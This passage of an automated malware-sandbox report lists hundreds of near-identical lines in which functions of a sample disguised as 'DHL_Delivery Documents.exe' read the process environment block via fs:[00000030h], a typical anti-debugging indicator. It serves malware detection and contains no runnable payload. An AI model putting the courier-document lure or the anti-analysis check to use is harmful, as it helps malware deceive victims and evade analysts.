            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C18550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C18550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20535 mov eax, dword ptr fs:[00000030h]8_2_01C20535
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C104E5 mov ecx, dword ptr fs:[00000030h]8_2_01C104E5
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCA49A mov eax, dword ptr fs:[00000030h]8_2_01CCA49A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C164AB mov eax, dword ptr fs:[00000030h]8_2_01C164AB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C444B0 mov ecx, dword ptr fs:[00000030h]8_2_01C444B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9A4B0 mov eax, dword ptr fs:[00000030h]8_2_01C9A4B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3245A mov eax, dword ptr fs:[00000030h]8_2_01C3245A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCA456 mov eax, dword ptr fs:[00000030h]8_2_01CCA456
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0645D mov eax, dword ptr fs:[00000030h]8_2_01C0645D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C460 mov ecx, dword ptr fs:[00000030h]8_2_01C9C460
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3A470 mov eax, dword ptr fs:[00000030h]8_2_01C3A470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3A470 mov eax, dword ptr fs:[00000030h]8_2_01C3A470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3A470 mov eax, dword ptr fs:[00000030h]8_2_01C3A470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48402 mov eax, dword ptr fs:[00000030h]8_2_01C48402
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48402 mov eax, dword ptr fs:[00000030h]8_2_01C48402
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48402 mov eax, dword ptr fs:[00000030h]8_2_01C48402
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E420 mov eax, dword ptr fs:[00000030h]8_2_01C0E420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E420 mov eax, dword ptr fs:[00000030h]8_2_01C0E420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E420 mov eax, dword ptr fs:[00000030h]8_2_01C0E420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0C427 mov eax, dword ptr fs:[00000030h]8_2_01C0C427
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A430 mov eax, dword ptr fs:[00000030h]8_2_01C4A430
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1C7C0 mov eax, dword ptr fs:[00000030h]8_2_01C1C7C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C907C3 mov eax, dword ptr fs:[00000030h]8_2_01C907C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E7E1 mov eax, dword ptr fs:[00000030h]8_2_01C9E7E1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C327ED mov eax, dword ptr fs:[00000030h]8_2_01C327ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C327ED mov eax, dword ptr fs:[00000030h]8_2_01C327ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C327ED mov eax, dword ptr fs:[00000030h]8_2_01C327ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C147FB mov eax, dword ptr fs:[00000030h]8_2_01C147FB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C147FB mov eax, dword ptr fs:[00000030h]8_2_01C147FB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB678E mov eax, dword ptr fs:[00000030h]8_2_01CB678E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC47A0 mov eax, dword ptr fs:[00000030h]8_2_01CC47A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C107AF mov eax, dword ptr fs:[00000030h]8_2_01C107AF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4674D mov esi, dword ptr fs:[00000030h]8_2_01C4674D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4674D mov eax, dword ptr fs:[00000030h]8_2_01C4674D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4674D mov eax, dword ptr fs:[00000030h]8_2_01C4674D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10750 mov eax, dword ptr fs:[00000030h]8_2_01C10750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E75D mov eax, dword ptr fs:[00000030h]8_2_01C9E75D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52750 mov eax, dword ptr fs:[00000030h]8_2_01C52750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52750 mov eax, dword ptr fs:[00000030h]8_2_01C52750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C94755 mov eax, dword ptr fs:[00000030h]8_2_01C94755
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18770 mov eax, dword ptr fs:[00000030h]8_2_01C18770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C700 mov eax, dword ptr fs:[00000030h]8_2_01C4C700
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10710 mov eax, dword ptr fs:[00000030h]8_2_01C10710
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C40710 mov eax, dword ptr fs:[00000030h]8_2_01C40710
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C720 mov eax, dword ptr fs:[00000030h]8_2_01C4C720
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C720 mov eax, dword ptr fs:[00000030h]8_2_01C4C720
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4273C mov eax, dword ptr fs:[00000030h]8_2_01C4273C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4273C mov ecx, dword ptr fs:[00000030h]8_2_01C4273C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4273C mov eax, dword ptr fs:[00000030h]8_2_01C4273C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8C730 mov eax, dword ptr fs:[00000030h]8_2_01C8C730
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A6C7 mov ebx, dword ptr fs:[00000030h]8_2_01C4A6C7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A6C7 mov eax, dword ptr fs:[00000030h]8_2_01C4A6C7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C906F1 mov eax, dword ptr fs:[00000030h]8_2_01C906F1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C906F1 mov eax, dword ptr fs:[00000030h]8_2_01C906F1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14690 mov eax, dword ptr fs:[00000030h]8_2_01C14690
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14690 mov eax, dword ptr fs:[00000030h]8_2_01C14690
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C6A6 mov eax, dword ptr fs:[00000030h]8_2_01C4C6A6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C466B0 mov eax, dword ptr fs:[00000030h]8_2_01C466B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2C640 mov eax, dword ptr fs:[00000030h]8_2_01C2C640
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD866E mov eax, dword ptr fs:[00000030h]8_2_01CD866E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD866E mov eax, dword ptr fs:[00000030h]8_2_01CD866E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A660 mov eax, dword ptr fs:[00000030h]8_2_01C4A660
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A660 mov eax, dword ptr fs:[00000030h]8_2_01C4A660
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C42674 mov eax, dword ptr fs:[00000030h]8_2_01C42674
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E609 mov eax, dword ptr fs:[00000030h]8_2_01C8E609
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52619 mov eax, dword ptr fs:[00000030h]8_2_01C52619
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C46620 mov eax, dword ptr fs:[00000030h]8_2_01C46620
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48620 mov eax, dword ptr fs:[00000030h]8_2_01C48620
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E627 mov eax, dword ptr fs:[00000030h]8_2_01C2E627
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1262C mov eax, dword ptr fs:[00000030h]8_2_01C1262C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA69C0 mov eax, dword ptr fs:[00000030h]8_2_01CA69C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C449D0 mov eax, dword ptr fs:[00000030h]8_2_01C449D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDA9D3 mov eax, dword ptr fs:[00000030h]8_2_01CDA9D3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E9E0 mov eax, dword ptr fs:[00000030h]8_2_01C9E9E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C429F9 mov eax, dword ptr fs:[00000030h]8_2_01C429F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C429F9 mov eax, dword ptr fs:[00000030h]8_2_01C429F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C109AD mov eax, dword ptr fs:[00000030h]8_2_01C109AD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C109AD mov eax, dword ptr fs:[00000030h]8_2_01C109AD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C989B3 mov esi, dword ptr fs:[00000030h]8_2_01C989B3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C989B3 mov eax, dword ptr fs:[00000030h]8_2_01C989B3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C989B3 mov eax, dword ptr fs:[00000030h]8_2_01C989B3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4940 mov eax, dword ptr fs:[00000030h]8_2_01CE4940
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C90946 mov eax, dword ptr fs:[00000030h]8_2_01C90946
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h]8_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h]8_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h]8_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E mov eax, dword ptr fs:[00000030h]8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E mov edx, dword ptr fs:[00000030h]8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E mov eax, dword ptr fs:[00000030h]8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB4978 mov eax, dword ptr fs:[00000030h]8_2_01CB4978
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB4978 mov eax, dword ptr fs:[00000030h]8_2_01CB4978
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C97C mov eax, dword ptr fs:[00000030h]8_2_01C9C97C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E908 mov eax, dword ptr fs:[00000030h]8_2_01C8E908
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E908 mov eax, dword ptr fs:[00000030h]8_2_01C8E908
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08918 mov eax, dword ptr fs:[00000030h]8_2_01C08918
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08918 mov eax, dword ptr fs:[00000030h]8_2_01C08918
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C912 mov eax, dword ptr fs:[00000030h]8_2_01C9C912
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA892B mov eax, dword ptr fs:[00000030h]8_2_01CA892B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9892A mov eax, dword ptr fs:[00000030h]8_2_01C9892A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E8C0 mov eax, dword ptr fs:[00000030h]8_2_01C3E8C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE08C0 mov eax, dword ptr fs:[00000030h]8_2_01CE08C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDA8E4 mov eax, dword ptr fs:[00000030h]8_2_01CDA8E4
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C8F9 mov eax, dword ptr fs:[00000030h]8_2_01C4C8F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C8F9 mov eax, dword ptr fs:[00000030h]8_2_01C4C8F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10887 mov eax, dword ptr fs:[00000030h]8_2_01C10887
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C89D mov eax, dword ptr fs:[00000030h]8_2_01C9C89D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C22840 mov ecx, dword ptr fs:[00000030h]8_2_01C22840
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C40854 mov eax, dword ptr fs:[00000030h]8_2_01C40854
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14859 mov eax, dword ptr fs:[00000030h]8_2_01C14859
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14859 mov eax, dword ptr fs:[00000030h]8_2_01C14859
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6870 mov eax, dword ptr fs:[00000030h]8_2_01CA6870
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6870 mov eax, dword ptr fs:[00000030h]8_2_01CA6870
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E872 mov eax, dword ptr fs:[00000030h]8_2_01C9E872
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E872 mov eax, dword ptr fs:[00000030h]8_2_01C9E872
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C810 mov eax, dword ptr fs:[00000030h]8_2_01C9C810
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB483A mov eax, dword ptr fs:[00000030h]8_2_01CB483A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB483A mov eax, dword ptr fs:[00000030h]8_2_01CB483A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A830 mov eax, dword ptr fs:[00000030h]8_2_01C4A830
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov ecx, dword ptr fs:[00000030h]8_2_01C32835
